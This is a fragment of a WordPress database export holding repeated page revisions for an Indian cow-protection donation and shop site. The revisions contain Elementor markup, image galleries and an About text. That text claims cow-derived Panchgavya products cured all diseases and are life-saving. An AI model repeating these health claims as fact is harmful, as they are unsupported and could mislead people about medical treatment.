https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/GOPALAK-COIN-2.0-pwh7pivzzxoisxtaw3iodq3bqsq80x3rkk57uej99q.png 75w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0.png 1000w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 11:12:01','2022-10-20 05:42:01','',1373,'https://gopalak.in/?p=1902',0,'revision','',0),(1903,1,'2022-10-20 11:12:44','2022-10-20 05:42:44','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 11:12:44','2022-10-20 05:42:44','',1804,'https://gopalak.in/?p=1903',0,'revision','',0),(1904,1,'2022-10-20 11:12:44','2022-10-20 05:42:44','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 11:12:44','2022-10-20 05:42:44','',1804,'https://gopalak.in/?p=1904',0,'revision','',0),(1905,1,'2022-10-20 11:12:44','2022-10-20 05:42:44','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-768x768.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/GOPALAK-COIN-2.0-pwh7pivzzxoisxtaw3iodq3bqsq80x3rkk57uej99q.png 75w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0.png 1000w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 11:12:44','2022-10-20 05:42:44','',1804,'https://gopalak.in/?p=1905',0,'revision','',0),(1906,1,'2022-10-20 11:14:05','2022-10-20 05:44:05','https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png','cropped-GOPALAK-COIN-2.0.png','','inherit','open','closed','','cropped-gopalak-coin-2-0-png','','','2022-10-20 11:14:05','2022-10-20 05:44:05','',0,'https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png',0,'attachment','image/png',0),(1910,1,'2022-10-20 11:17:10','2022-10-20 05:47:10','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-768x768.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/GOPALAK-COIN-2.0-pwh7pivzzxoisxtaw3iodq3bqsq80x3rkk57uej99q.png 75w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK-COIN-2.0.png 1000w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" 